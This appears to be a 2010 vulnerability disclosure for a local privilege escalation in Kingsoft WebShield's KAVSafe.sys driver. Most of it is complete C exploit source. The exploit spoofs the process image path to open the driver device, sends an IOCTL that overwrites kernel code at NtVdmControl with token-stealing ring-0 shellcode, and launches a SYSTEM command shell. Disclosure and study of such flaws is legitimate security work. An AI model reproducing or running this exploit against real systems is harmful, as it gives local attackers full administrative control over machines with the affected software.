|
=0D
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability=0D
VULNERABLE PRODUCTS=0D
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)=0D
=0D
Signature Date: 2010-5-23 2:33:54=0D
=0D
And=0D
=0D
KAVSafe.sys <= 2010.4.14.609=0D
Signature Date:2010-4-14 13:42:26=0D
=0D
DETAILS:=0D
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data=0D
=0D
EXPLOIT CODE:=0D
=0D
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)=0D
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(=0D
HANDLE ProcessHandle,=0D
DWORD ProcessInformationClass,=0D
PVOID ProcessInformation,=0D
ULONG ProcessInformationLength,=0D
PULONG ReturnLength=0D
);=0D
=0D
typedef struct _STRING {=0D
USHORT Length;=0D
USHORT MaximumLength;=0D
PCHAR Buffer;=0D
} STRING;=0D
typedef STRING *PSTRING;=0D
typedef struct _RTL_DRIVE_LETTER_CURDIR {=0D
USHORT Flags;=0D
USHORT Length;=0D
ULONG TimeStamp;=0D
STRING DosPath;=0D
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;=0D
typedef struct _UNICODE_STRING {=0D
USHORT Length;=0D
USHORT MaximumLength;=0D
PWSTR Buffer;=0D
} UNICODE_STRING;=0D
typedef UNICODE_STRING *PUNICODE_STRING;=0D
typedef const UNICODE_STRING *PCUNICODE_STRING;=0D
#define RTL_MAX_DRIVE_LETTERS 32=0D
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001=0D
typedef struct _CURDIR {=0D
UNICODE_STRING DosPath;=0D
HANDLE Handle;=0D
} CURDIR, *PCURDIR;=0D
typedef struct _RTL_USER_PROCESS_PARAMETERS {=0D
ULONG MaximumLength;=0D
ULONG Length;=0D
ULONG Flags;=0D
ULONG DebugFlags;=0D
HANDLE ConsoleHandle;=0D
ULONG ConsoleFlags;=0D
HANDLE StandardInput;=0D
HANDLE StandardOutput;=0D
HANDLE StandardError;=0D
CURDIR CurrentDirectory; // ProcessParameters=0D
UNICODE_STRING DllPath; // ProcessParameters=0D
UNICODE_STRING ImagePathName; // ProcessParameters=0D
UNICODE_STRING CommandLine; // ProcessParameters=0D
PVOID Environment; // NtAllocateVirtualMemory=0D
ULONG StartingX;=0D
ULONG StartingY;=0D
ULONG CountX;=0D
ULONG CountY;=0D
ULONG CountCharsX;=0D
ULONG CountCharsY;=0D
ULONG FillAttribute;=0D
ULONG WindowFlags;=0D
ULONG ShowWindowFlags;=0D
UNICODE_STRING WindowTitle; // ProcessParameters=0D
UNICODE_STRING DesktopInfo; // ProcessParameters=0D
UNICODE_STRING ShellInfo; // ProcessParameters=0D
UNICODE_STRING RuntimeData; // ProcessParameters=0D
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];=0D
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;=0D
typedef struct _PEB {=0D
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the=0D
BOOLEAN ReadImageFileExecOptions; //=0D
BOOLEAN BeingDebugged; //=0D
BOOLEAN SpareBool; //=0D
HANDLE Mutant; // INITIAL_PEB structure is also updated.=0D
PVOID ImageBaseAddress;=0D
PVOID Ldr;=0D
struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;=0D
} PEB, *PPEB;=0D
typedef LONG KPRIORITY;=0D
typedef struct _PROCESS_BASIC_INFORMATION {=0D
LONG ExitStatus;=0D
PVOID PebBaseAddress;=0D
ULONG_PTR AffinityMask;=0D
KPRIORITY BasePriority;=0D
ULONG_PTR UniqueProcessId;=0D
ULONG_PTR InheritedFromUniqueProcessId;=0D
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;=0D
typedef struct {=0D
ULONG Unknown1;=0D
ULONG Unknown2;=0D
PVOID Base;=0D
ULONG Size;=0D
ULONG Flags;=0D
USHORT Index;=0D
USHORT NameLength;=0D
USHORT LoadCount;=0D
USHORT PathLength;=0D
CHAR ImageName[256];=0D
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;=0D
=0D
typedef struct {=0D
ULONG Count;=0D
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];=0D
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;=0D
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (=0D
LONG SystemInformationClass,=0D
PVOID SystemInformation,=0D
ULONG SystemInformationLength,=0D
PULONG ReturnLength=0D
);=0D
=0D
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )=0D
typedef LONG (WINAPI *PNT_VDM_CONTROL) (=0D
ULONG Service,=0D
PVOID ServiceData=0D
);=0D
VOID __declspec(naked) R0ShellCodeXP()=0D
{=0D
__asm=0D
{=0D
mov eax,0xffdff124=0D
mov eax,[eax]=0D
mov esi ,dword ptr[eax+0x220]=0D
mov eax,esi=0D
searchxp:=0D
mov eax,dword ptr[eax+0x88]=0D
sub eax,0x88=0D
mov edx,dword ptr[eax+0x84]=0D
cmp edx,4=0D
jnz searchxp=0D
mov eax,dword ptr[eax+0xc8]=0D
mov dword ptr[esi + 0xc8] , eax=0D
ret 8=0D
}=0D
}=0D
VOID NopNop()=0D
{=0D
printf("nop!\n");=0D
}=0D
=0D
#include "malloc.h"=0D
int main(int argc, char* argv[])=0D
{=0D
=0D
printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"=0D
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"=0D
"2010-5-23\n"=0D
"By Lincoin \n\nPress Enter");=0D
HKEY hkey ;=0D
WCHAR InstallPath[MAX_PATH];=0D
DWORD datatype ;=0D
DWORD datasize = MAX_PATH * sizeof(WCHAR);=0D
ULONG oldlen ;=0D
PVOID pOldBufferData = NULL ;=0D
=0D
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)=0D
{=0D
if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)=0D
{=0D
RegCloseKey(hkey);=0D
printf("KSWebShield not installed\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
=0D
RegCloseKey(hkey);=0D
}=0D
else=0D
{=0D
printf("KSWebShield not installed\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
wcscat(InstallPath , L"\\kavinst.exe");=0D
=0D
=0D
PROCESS_BASIC_INFORMATION pbi ;=0D
=0D
PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;=0D
pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");=0D
pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);=0D
=0D
PPEB peb ;=0D
=0D
peb = (PPEB)pbi.PebBaseAddress;=0D
oldlen = peb->ProcessParameters->ImagePathName.Length;=0D
peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);=0D
pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);=0D
RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);=0D
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );=0D
HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,=0D
FILE_READ_ATTRIBUTES ,=0D
FILE_SHARE_READ ,=0D
0,=0D
OPEN_EXISTING ,=0D
0,=0D
0);=0D
=0D
if (hdev==INVALID_HANDLE_VALUE)=0D
{=0D
printf("cannot open device %u\n", GetLastError());=0D
getchar();=0D
return 0 ;=0D
}=0D
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);=0D
peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;=0D
=0D
PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ;=0D
pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");=0D
X_SYSTEM_MODULE_INFORMATION sysmod ;=0D
HMODULE KernelHandle ;=0D
=0D
pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);=0D
KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);=0D
if (KernelHandle == 0 )=0D
{=0D
printf("cannot load ntoskrnl!\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");=0D
=0D
if (pNtVdmControl == 0 )=0D
{=0D
printf("cannot find NtVdmControl!\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );=0D
=0D
printf("NtVdmControl = %08x" , pNtVdmControl );=0D
getchar();=0D
ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;=0D
ULONG pShellCode = (ULONG)R0ShellCodeXP;=0D
=0D
=0D
PVOID Data = malloc(0x48 + ShellCodeSize);=0D
=0D
CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);=0D
CHAR ModuleName[68]= "ntoskrnl.exe" ;=0D
RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));=0D
*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;=0D
*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;=0D
ULONG btr ;=0D
if (!DeviceIoControl(hdev ,=0D
IOCTL_HOTPATCH_KERNEL_MODULE ,=0D
Data ,=0D
0x48 + ShellCodeSize ,=0D
NULL ,=0D
0,=0D
&btr , 0=0D
))=0D
{=0D
printf("cannot device io control!%u\n" , GetLastError());=0D
getchar();=0D
return 0;=0D
}=0D
=0D
CloseHandle(hdev);=0D
=0D
PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");=0D
pR3NtVdmControl(0,0);=0D
WinExec("cmd.exe" , SW_SHOW);=0D
printf("OK!\n ");=0D
=0D
getchar();=0D
=0D
return 0;=0D
}=0D
=0D
=0D
=0D
=0D